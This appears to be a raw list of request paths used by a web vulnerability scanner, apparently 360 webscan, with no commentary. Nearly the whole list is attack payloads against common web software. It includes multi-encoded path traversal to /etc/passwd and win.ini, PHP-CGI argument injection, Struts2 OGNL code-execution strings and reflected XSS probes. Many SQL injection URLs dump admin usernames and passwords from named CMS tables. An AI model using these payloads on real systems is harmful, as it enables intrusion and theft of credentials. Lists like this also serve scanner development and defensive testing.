
Created December 6, 2014 06:07
/robots.txt
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/jsky_web_scanner_test_file.txt
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/wp-admin
/admin.php
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/dede/
/administrator/
/user
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/TRACE_test
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/TRACK_test
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/_vti_bin/_vti_adm/admin.dll
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/_vti_bin/_vti_aut/author.dll
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/server-info
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/server-status
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/jmx-console/
/.../.../.../.../.../.../.../.../windows/win.ini
/web-console/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/webscan360noThisFile*~1*/.aspx
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/etc/passwd
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/phpMyAdmin/show_config_errors.php
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/xampp/index.php
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/?search=just_test_not_find_href
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/$
/.../.../.../.../.../.../.../.../etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/solr/dev/admin/
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%3Cscript%3Ealert(42873).do
/level/15/exec/-/show/running-config/CR
/%3Cscript%20s%3Ealert(42873)
/plugins/weathermap/weathermap-cacti-plugin.php
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/icons/index
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/icons/small/index
/'IHLD
/install.php
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/extras/curltest.php?url=file://curltest.php
/.svn/entries
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/flow.php?step=login
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/webscan_360_cn.html
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/webscan_360_cn.html
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
